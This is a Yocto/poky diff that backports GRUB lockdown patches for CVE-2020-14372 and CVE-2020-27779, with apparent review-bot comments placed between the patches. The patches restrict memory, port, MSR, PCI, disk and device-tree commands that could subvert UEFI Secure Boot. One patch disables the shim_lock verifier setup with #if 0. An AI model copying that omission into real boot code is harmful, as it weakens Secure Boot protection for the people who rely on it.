MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>. 
++ * ++ */ ++ ++#include <grub/dl.h> ++#include <grub/file.h> ++#include <grub/lockdown.h> ++#include <grub/verify.h> ++ ++static int lockdown = GRUB_LOCKDOWN_DISABLED; ++ ++static grub_err_t ++lockdown_verifier_init (grub_file_t io __attribute__ ((unused)), ++ enum grub_file_type type, ++ void **context __attribute__ ((unused)), ++ enum grub_verify_flags *flags) ++{ ++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION; ++ ++ switch (type & GRUB_FILE_TYPE_MASK) ++ { ++ case GRUB_FILE_TYPE_GRUB_MODULE: ++ case GRUB_FILE_TYPE_LINUX_KERNEL: ++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL: ++ case GRUB_FILE_TYPE_XEN_HYPERVISOR: ++ case GRUB_FILE_TYPE_BSD_KERNEL: ++ case GRUB_FILE_TYPE_XNU_KERNEL: ++ case GRUB_FILE_TYPE_PLAN9_KERNEL: ++ case GRUB_FILE_TYPE_NTLDR: ++ case GRUB_FILE_TYPE_TRUECRYPT: ++ case GRUB_FILE_TYPE_FREEDOS: ++ case GRUB_FILE_TYPE_PXECHAINLOADER: ++ case GRUB_FILE_TYPE_PCCHAINLOADER: ++ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER: ++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE: ++ case GRUB_FILE_TYPE_ACPI_TABLE: ++ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE: ++ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH; ++ ++ /* Fall through. 
*/ ++ ++ default: ++ return GRUB_ERR_NONE; ++ } ++} ++ ++struct grub_file_verifier lockdown_verifier = ++ { ++ .name = "lockdown_verifier", ++ .init = lockdown_verifier_init, ++ }; ++ ++void ++grub_lockdown (void) ++{ ++ lockdown = GRUB_LOCKDOWN_ENABLED; ++ ++ grub_verifier_register (&lockdown_verifier); ++} ++ ++int ++grub_is_lockdown (void) ++{ ++ return lockdown; ++} +diff --git a/include/grub/command.h b/include/grub/command.h +index eee4e84..2a6f7f8 100644 +--- a/include/grub/command.h ++++ b/include/grub/command.h +@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name, + const char *summary, + const char *description, + int prio); ++grub_command_t ++EXPORT_FUNC(grub_register_command_lockdown) (const char *name, ++ grub_command_func_t func, ++ const char *summary, ++ const char *description); + void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd); + + static inline grub_command_t +diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h +index 19fe592..fe9248b 100644 +--- a/include/grub/extcmd.h ++++ b/include/grub/extcmd.h +@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name, + const char *description, + const struct grub_arg_option *parser); + ++grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name, ++ grub_extcmd_func_t func, ++ grub_command_flags_t flags, ++ const char *summary, ++ const char *description, ++ const struct grub_arg_option *parser); ++ + grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name, + grub_extcmd_func_t func, + grub_command_flags_t flags, +diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h +new file mode 100644 +index 0000000..40531fa +--- /dev/null ++++ b/include/grub/lockdown.h +@@ -0,0 +1,44 @@ ++/* ++ * GRUB -- GRand Unified Bootloader ++ * Copyright (C) 2020 Free Software Foundation, Inc. 
++ * ++ * GRUB is free software: you can redistribute it and/or modify ++ * it under the terms of the GNU General Public License as published by ++ * the Free Software Foundation, either version 3 of the License, or ++ * (at your option) any later version. ++ * ++ * GRUB is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>. ++ */ ++ ++#ifndef GRUB_LOCKDOWN_H ++#define GRUB_LOCKDOWN_H 1 ++ ++#include <grub/symbol.h> ++ ++#define GRUB_LOCKDOWN_DISABLED 0 ++#define GRUB_LOCKDOWN_ENABLED 1 ++ ++#ifdef GRUB_MACHINE_EFI ++extern void ++EXPORT_FUNC (grub_lockdown) (void); ++extern int ++EXPORT_FUNC (grub_is_lockdown) (void); ++#else ++static inline void ++grub_lockdown (void) ++{ ++} ++ ++static inline int ++grub_is_lockdown (void) ++{ ++ return GRUB_LOCKDOWN_DISABLED; ++} ++#endif ++#endif /* ! GRUB_LOCKDOWN_H */ diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch new file mode 100644 index 0000000000..93fdd2cb1a --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch 
@@ -0,0 +1,57 @@
+From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 2 Feb 2021 19:59:48 +0100
+Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down
+
+It may be useful for scripts to determine whether the GRUB is locked
+down or not. Add the lockdown variable which is set to "y" when the GRUB
+is locked down.
+
+Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/kern/lockdown.c | 4 ++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index d778bfb..5e6cace 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl
+ if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
+ be restricted and some operations/commands cannot be executed.
+
++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down.
++Otherwise it does not exit.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+index 1e56c0b..0bc70fd 100644
+--- a/grub-core/kern/lockdown.c
++++ b/grub-core/kern/lockdown.c
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/dl.h>
++#include <grub/env.h>
+ #include <grub/file.h>
+ #include <grub/lockdown.h>
+ #include <grub/verify.h>
+@@ -71,6 +72,9 @@ grub_lockdown (void)
+ lockdown = GRUB_LOCKDOWN_ENABLED;
+
+ grub_verifier_register (&lockdown_verifier);
++
++ grub_env_set ("lockdown", "y");
++ grub_env_export ("lockdown");
+ }
+
+ int
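Review bot: The `lockdown` variable set in grub_lockdown() is an ordinary exported environment variable, and no write hook is registered in the visible lines, so a configuration script can apparently overwrite or unset it. Enforcement still comes from the static `lockdown` flag read by grub_is_lockdown(), and a comment should say so, e.g. `/* Informational only: scripts can change this variable; policy checks must use grub_is_lockdown(). */`. The results of grub_env_set() and grub_env_export() are also discarded, so a failed set would leave the variable absent on a locked-down system without any diagnostic. In the grub.texi hunk, `Otherwise it does not exit.` should read `Otherwise it does not exist.`. grub_lockdown() begins above the visible context of the lockdown.c hunk.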
diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
new file mode 100644
index 0000000000..ac509b63c7
--- /dev/null
+++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
@@ -0,0 +1,52 @@
+From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:29 +0200
+Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled
+
+If the UEFI Secure Boot is enabled then the GRUB must be locked down
+to prevent executing code that can potentially be used to subvert its
+verification mechanisms.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/init.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c
+index 3dfdf2d..db84d82 100644
+--- a/grub-core/kern/efi/init.c
++++ b/grub-core/kern/efi/init.c
+@@ -20,6 +20,7 @@
+ #include <grub/efi/efi.h>
+ #include <grub/efi/console.h>
+ #include <grub/efi/disk.h>
++#include <grub/lockdown.h>
+ #include <grub/term.h>
+ #include <grub/misc.h>
+ #include <grub/env.h>
+@@ -39,6 +40,20 @@ grub_efi_init (void)
+ /* Initialize the memory management system. */
+ grub_efi_mm_init ();
+
++ /*
++ * Lockdown the GRUB and register the shim_lock verifier
++ * if the UEFI Secure Boot is enabled.
++ */
++ if (grub_efi_secure_boot ())
++ {
++ grub_lockdown ();
++ /* NOTE: Our version does not have the shim_lock_verifier,
++ * need to update below if added */
++#if 0
++ grub_shim_lock_verifier_setup ();
++#endif
++ }
++
+ efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer,
+ 0, 0, 0, NULL);
+
diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
new file mode 100644
index 0000000000..12ec4e1c17
--- /dev/null
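Review bot: The `#if 0` around `grub_shim_lock_verifier_setup ();` in grub_efi_init() makes this a modified backport and leaves lockdown without a verifier that authenticates anything. lockdown_verifier_init(), added earlier in this series, only sets `GRUB_VERIFY_FLAGS_DEFER_AUTH` for modules, kernels, ACPI tables and device trees. If this tree's verifier framework behaves like upstream, a deferred file that no other verifier claims is refused, so booting under Secure Boot would depend on another verifier (for example PGP) being present; that is worth confirming with a Secure Boot test image. I would drop the dead `#if 0` block in favour of the comment alone and record the deviation in the patch header, e.g. `Upstream-Status: Backport [<upstream URL>; shim_lock verifier setup omitted]`. grub_efi_init() continues past the end of the hunk.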
+++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch 
@@ -0,0 +1,158 @@ +From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Mon, 28 Sep 2020 20:08:33 +0200 +Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled + modules list + +Now the GRUB can check if it has been locked down and this can be used to +prevent executing commands that can be utilized to circumvent the UEFI +Secure Boot mechanisms. So, instead of hardcoding a list of modules that +have to be disabled, prevent the usage of commands that can be dangerous. + +This not only allows the commands to be disabled on other platforms, but +also properly separate the concerns. Since the shim_lock verifier logic +should be only about preventing to run untrusted binaries and not about +defining these kind of policies. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 10 ++++++++++ + grub-core/commands/i386/wrmsr.c | 5 +++-- + grub-core/commands/iorw.c | 19 ++++++++++--------- + grub-core/commands/memrw.c | 19 ++++++++++--------- + 4 files changed, 33 insertions(+), 20 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 5e6cace..0786427 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command. + Also, if you specify a reserved or unimplemented MSR address, it will + cause a general protection exception (which is not currently being handled) + and the system will reboot. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This is done to prevent subverting various security mechanisms. 
+ @end deffn + + @node xen_hypervisor +@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the + shim_lock module. And itself it is a persistent module which means that + it cannot be unloaded if it was loaded into the memory. + ++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables, ++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands ++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw} ++and @command{memrw} will not be available when the UEFI secure boot is enabled. ++This is done for security reasons and are enforced by the GRUB Lockdown mechanism ++(@pxref{Lockdown}). ++ + @node Measured Boot + @section Measuring boot components + +diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c +index 9c5e510..56a29c2 100644 +--- a/grub-core/commands/i386/wrmsr.c ++++ b/grub-core/commands/i386/wrmsr.c +@@ -24,6 +24,7 @@ + #include <grub/env.h> + #include <grub/command.h> + #include <grub/extcmd.h> ++#include <grub/lockdown.h> + #include <grub/i18n.h> + #include <grub/i386/cpuid.h> + #include <grub/i386/wrmsr.h> +@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char + + GRUB_MOD_INIT(wrmsr) + { +- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"), +- N_("Write a value to a CPU model specific register.")); ++ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"), ++ N_("Write a value to a CPU model specific register.")); + } + + GRUB_MOD_FINI(wrmsr) +diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c +index a0c164e..584baec 100644 +--- a/grub-core/commands/iorw.c ++++ b/grub-core/commands/iorw.c +@@ -23,6 +23,7 @@ + #include <grub/env.h> + #include <grub/cpu/io.h> + #include <grub/i18n.h> ++#include <grub/lockdown.h> + + GRUB_MOD_LICENSE ("GPLv3+"); + +@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw) + 
N_("PORT"), N_("Read 32-bit value from PORT."), + options); + cmd_write_byte = +- grub_register_command ("outb", grub_cmd_write, +- N_("PORT VALUE [MASK]"), +- N_("Write 8-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outb", grub_cmd_write, ++ N_("PORT VALUE [MASK]"), ++ N_("Write 8-bit VALUE to PORT.")); + cmd_write_word = +- grub_register_command ("outw", grub_cmd_write, +- N_("PORT VALUE [MASK]"), +- N_("Write 16-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outw", grub_cmd_write, ++ N_("PORT VALUE [MASK]"), ++ N_("Write 16-bit VALUE to PORT.")); + cmd_write_dword = +- grub_register_command ("outl", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 32-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outl", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 32-bit VALUE to PORT.")); + } + + GRUB_MOD_FINI(memrw) +diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c +index 98769ea..d401a6d 100644 +--- a/grub-core/commands/memrw.c ++++ b/grub-core/commands/memrw.c +@@ -22,6 +22,7 @@ + #include <grub/extcmd.h> + #include <grub/env.h> + #include <grub/i18n.h> ++#include <grub/lockdown.h> + + GRUB_MOD_LICENSE ("GPLv3+"); + +@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw) + N_("ADDR"), N_("Read 32-bit value from ADDR."), + options); + cmd_write_byte = +- grub_register_command ("write_byte", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 8-bit VALUE to ADDR.")); ++ grub_register_command_lockdown ("write_byte", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 8-bit VALUE to ADDR.")); + cmd_write_word = +- grub_register_command ("write_word", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 16-bit VALUE to ADDR.")); ++ grub_register_command_lockdown ("write_word", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 16-bit VALUE to ADDR.")); + cmd_write_dword = +- grub_register_command ("write_dword", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 32-bit VALUE to ADDR.")); 
++ grub_register_command_lockdown ("write_dword", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 32-bit VALUE to ADDR.")); + } + + GRUB_MOD_FINI(memrw) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch new file mode 100644 index 0000000000..c82423b8af --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch 
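Review bot: The grub.texi text added to the UEFI secure boot section says `@command{iorw}` and `@command{memrw}` "will not be available", but the code only moves the write commands (`outb`/`outw`/`outl`, `write_byte`/`write_word`/`write_dword`) and `wrmsr` to grub_register_command_lockdown(); the read registrations visible as context in both GRUB_MOD_INIT bodies are unchanged. `iorw` and `memrw` are also module names rather than commands. Suggested wording: `the write commands of the @samp{iorw} and @samp{memrw} modules and @command{wrmsr} are not allowed when the UEFI secure boot is enabled`, and `and are enforced` in the next sentence should be `and is enforced`. If leaving port and memory reads available under lockdown is intentional, a short comment next to the read registrations would record that decision. Both GRUB_MOD_INIT bodies start outside their hunks.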
@@ -0,0 +1,70 @@ +From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 14 Oct 2020 16:33:42 +0200 +Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown + is enforced + +The cutmem and badram commands can be used to remove EFI memory regions +and potentially disable the UEFI Secure Boot. Prevent the commands to be +registered if the GRUB is locked down. + +Fixes: CVE-2020-27779 + +Reported-by: Teddy Reed <teddy.reed@gmail.com> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 4 ++++ + grub-core/mmap/mmap.c | 13 +++++++------ + 2 files changed, 11 insertions(+), 6 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 47ac7ff..a1aaee6 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns + that are often result of memory damage, due to physical distribution of memory + cells. + ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This prevents removing EFI memory regions to potentially subvert the ++ security mechanisms provided by the UEFI secure boot. 
++ + @node blocklist + @subsection blocklist + +diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c +index 57b4e9a..7ebf32e 100644 +--- a/grub-core/mmap/mmap.c ++++ b/grub-core/mmap/mmap.c +@@ -20,6 +20,7 @@ + #include <grub/memory.h> + #include <grub/machine/memory.h> + #include <grub/err.h> ++#include <grub/lockdown.h> + #include <grub/misc.h> + #include <grub/mm.h> + #include <grub/command.h> +@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut; + + GRUB_MOD_INIT(mmap) + { +- cmd = grub_register_command ("badram", grub_cmd_badram, +- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"), +- N_("Declare memory regions as faulty (badram).")); +- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem, +- N_("FROM[K|M|G] TO[K|M|G]"), +- N_("Remove any memory regions in specified range.")); ++ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram, ++ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"), ++ N_("Declare memory regions as faulty (badram).")); ++ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem, ++ N_("FROM[K|M|G] TO[K|M|G]"), ++ N_("Remove any memory regions in specified range.")); + + } + diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch new file mode 100644 index 0000000000..e33c96a05b --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch 
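Review bot: `badram` and `cutmem` only receive the denying handler if lockdown is already enabled when GRUB_MOD_INIT(mmap) runs, because grub_register_command_lockdown() (added earlier in this series) samples grub_is_lockdown() once at registration and never re-checks it. That holds as long as grub_lockdown() is called from grub_efi_init() before any module is initialised, which appears to be the intent but is not stated anywhere in the series. A comment above the two registrations, e.g. `/* Lockdown is evaluated at registration; grub_lockdown() must already have run. */`, would keep a later reordering from silently re-enabling these commands; the same applies to the other `*_lockdown` registrations in the following patches. Separately, the subject says "Don't register" while both commands are still registered with a stub handler, so they presumably remain listed by `help`.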
@@ -0,0 +1,105 @@ +From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 09:00:05 +0100 +Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs + when locked down + +There are some more commands that should be restricted when the GRUB is +locked down. Following is the list of commands and reasons to restrict: + + * fakebios: creates BIOS-like structures for backward compatibility with + existing OSes. This should not be allowed when locked down. + + * loadbios: reads a BIOS dump from storage and loads it. This action + should not be allowed when locked down. + + * devicetree: loads a Device Tree blob and passes it to the OS. It replaces + any Device Tree provided by the firmware. This also should + not be allowed when locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 3 +++ + grub-core/commands/efi/loadbios.c | 16 ++++++++-------- + grub-core/loader/arm/linux.c | 6 +++--- + grub-core/loader/efi/fdt.c | 4 ++-- + 4 files changed, 16 insertions(+), 13 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index a1aaee6..ccf1908 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux + kernel. Does not perform merging with any device tree supplied by firmware, + but rather replaces it completely. + @ref{GNU/Linux}. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This is done to prevent subverting various security mechanisms. 
+ @end deffn + + @node distrust +diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c +index d41d521..5c7725f 100644 +--- a/grub-core/commands/efi/loadbios.c ++++ b/grub-core/commands/efi/loadbios.c +@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios; + + GRUB_MOD_INIT(loadbios) + { +- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios, +- 0, N_("Create BIOS-like structures for" +- " backward compatibility with" +- " existing OS.")); +- +- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios, +- N_("BIOS_DUMP [INT10_DUMP]"), +- N_("Load BIOS dump.")); ++ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios, ++ 0, N_("Create BIOS-like structures for" ++ " backward compatibility with" ++ " existing OS.")); ++ ++ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios, ++ N_("BIOS_DUMP [INT10_DUMP]"), ++ N_("Load BIOS dump.")); + } + + GRUB_MOD_FINI(loadbios) +diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c +index d70c174..ed23dc7 100644 +--- a/grub-core/loader/arm/linux.c ++++ b/grub-core/loader/arm/linux.c +@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux) + 0, N_("Load Linux.")); + cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd, + 0, N_("Load initrd.")); +- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree, +- /* TRANSLATORS: DTB stands for device tree blob. */ +- 0, N_("Load DTB file.")); ++ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, ++ /* TRANSLATORS: DTB stands for device tree blob. 
*/ ++ 0, N_("Load DTB file.")); + my_mod = mod; + current_fdt = (const void *) grub_arm_firmware_get_boot_data (); + machine_type = grub_arm_firmware_get_machine_type (); +diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c +index ee9c559..003d07c 100644 +--- a/grub-core/loader/efi/fdt.c ++++ b/grub-core/loader/efi/fdt.c +@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree; + GRUB_MOD_INIT (fdt) + { + cmd_devicetree = +- grub_register_command ("devicetree", grub_cmd_devicetree, 0, +- N_("Load DTB file.")); ++ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0, ++ N_("Load DTB file.")); + } + + GRUB_MOD_FINI (fdt) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch new file mode 100644 index 0000000000..f9a6a73ebc --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch 
@@ -0,0 +1,37 @@ +From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 22:59:59 +0100 +Subject: [PATCH] commands/setpci: Restrict setpci command when locked down + +This command can set PCI devices register values, which makes it dangerous +in a locked down configuration. Restrict it so can't be used on this setup. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/commands/setpci.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c +index d5bc97d..fa2ba7d 100644 +--- a/grub-core/commands/setpci.c ++++ b/grub-core/commands/setpci.c +@@ -329,10 +329,10 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(setpci) + { +- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0, +- N_("[-s POSITION] [-d DEVICE] [-v VAR] " +- "REGISTER[=VALUE[:MASK]]"), +- N_("Manipulate PCI devices."), options); ++ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0, ++ N_("[-s POSITION] [-d DEVICE] [-v VAR] " ++ "REGISTER[=VALUE[:MASK]]"), ++ N_("Manipulate PCI devices."), options); + } + + GRUB_MOD_FINI(setpci) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch new file mode 100644 index 0000000000..a756f8d1cf --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch 
@@ -0,0 +1,35 @@ +From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 12:59:29 +0100 +Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down + +The command can be used to get/set ATA disk parameters. Some of these can +be dangerous since change the disk behavior. Restrict it when locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/commands/hdparm.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c +index d3fa966..2e2319e 100644 +--- a/grub-core/commands/hdparm.c ++++ b/grub-core/commands/hdparm.c +@@ -436,9 +436,9 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(hdparm) + { +- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0, +- N_("[OPTIONS] DISK"), +- N_("Get/set ATA disk parameters."), options); ++ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0, ++ N_("[OPTIONS] DISK"), ++ N_("Get/set ATA disk parameters."), options); + } + + GRUB_MOD_FINI(hdparm) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch new file mode 100644 index 0000000000..b52273ff50 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch 
